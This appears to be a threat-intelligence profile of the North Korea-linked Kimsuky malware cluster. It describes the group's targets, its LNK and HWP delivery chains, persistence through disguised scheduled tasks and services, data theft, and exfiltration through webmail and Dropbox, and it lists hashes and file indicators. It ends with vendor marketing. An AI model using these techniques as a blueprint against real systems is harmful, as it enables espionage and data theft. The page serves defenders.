Kimsuky is a North Korea-linked cyber-espionage malware/threat cluster associated with targeted operations primarily against South Korean organizations, including think tanks, political and unification-related entities, government-linked institutions, and in one reported case a pharmaceutical-themed target. Reported campaigns used spear-phishing and socially engineered lures such as weaponized Hangul Word Processor (HWP) documents and Windows LNK files disguised as business documents, including a personal-information consent form and an ERP specification document.
Observed Kimsuky malware capabilities in the provided content include host reconnaissance, information theft, keylogging, form-grabbing to extract emails and passwords from web forms, directory and process listing, HWP document theft, persistence via Windows services and scheduled tasks, UAC bypass, and remote control through modified TeamViewer components. Multiple reports describe malware that disables or weakens host defenses by modifying registry settings related to Windows Firewall, Windows Security Center, and AhnLab V3 firewall settings.
Several delivery and execution chains are described. One campaign used malicious HWP files exploiting a vulnerability in the HWPTAG_PARA_LINE_SEG structure to drop DLL backdoors into %TEMP% and %SYSTEM%, register them as service DLLs, and conduct espionage. Another used a malicious LNK containing obfuscated PowerShell that fetched and executed additional PowerShell payloads filelessly, created downloader and loader scripts on disk, established persistence with Windows Task Scheduler, opened a benign decoy document, and deleted the original shortcut. A separate LNK sample themed as "화이트 생명과학 ERP 사양서.lnk" embedded a decoy .xlsx, scheduled-task XML, JavaScript launcher, and XOR-obfuscated PowerShell payload; it stored components under C:\sysconfigs, persisted via a scheduled task named "Avast Secure Browser VPS Differential Update Ex," and launched 32-bit PowerShell via SysWOW64.
Command-and-control and exfiltration methods in the content include abuse of webmail accounts and legitimate cloud/web services. Earlier Kimsuky malware used mail.bg and other webmail providers including zoho.com, mail.com, india.com, opera.com, and indiatimes.com to send stolen data as email attachments to operator-controlled "master" accounts. Other variants used Dropbox APIs to upload victim information and download BAT command files for execution, free web hosting on bugs3.com, and FTP services from dothome.co.kr. The malware also used external services such as OpenDNS to determine public IP addresses.
Collected victim data explicitly mentioned in the content includes domain and username, OS version, public IP address, MAC-derived victim identifier, installed security product information, network configuration, drive information, recently modified files, running processes, systeminfo output, computer name, directory listings, and keystrokes. Some variants encrypted exfiltrated data using RC4 with MD5-derived keys and additional RSA protection for key material; another PowerShell sample used RC4 plus Base64 encoding for selected fields.
Notable indicators and artifacts directly mentioned include the lure filename "화이트 생명과학 ERP 사양서.lnk"; hashes MD5 5c3bf036ab8aadddb2428d27f3917b86, SHA-1 e9c16aa2e322a65fc2621679ca8e7414ebcf89c0, and SHA-256 d4c184f4389d710c8aefe296486d4d3e430da609d86fa6289a8cea9fde4a1166; dropped or persisted files such as C:\sysconfigs\opakib.ps1, C:\sysconfigs\copa08o.js, C:\sysconfigs\sop0ef903r, %SystemRoot%\System32\telnet.dll, KBDLV2.DLL, AUTO.DLL, ~tmp.dll, telmgr.dll, olethk64.dll, browsesc.dll, and TeamViewer-related components; and service/task names including TelnetManagement, DriverManage, WebService, WebClientManager, Remote Access Service, and "Avast Secure Browser VPS Differential Update Ex."
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
19 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
7 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
The content compares the information-stealing PowerShell script’s behavior to past Kimsuky-linked activity, but does not identify a specific malware family name beyond that reference.
A malicious LNK-based infection chain attributed in the content to Kimsuky. It disguises itself as an Excel document, extracts decoy and payload files from the LNK, establishes persistence via a scheduled task, runs a JavaScript launcher and PowerShell payload, and uses Dropbox API as C2 to upload victim information and download BAT commands for execution.
Kimsuky is a North Korean-linked APT group using custom malware frameworks for cyberespionage, targeting South Korean political and research organizations.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.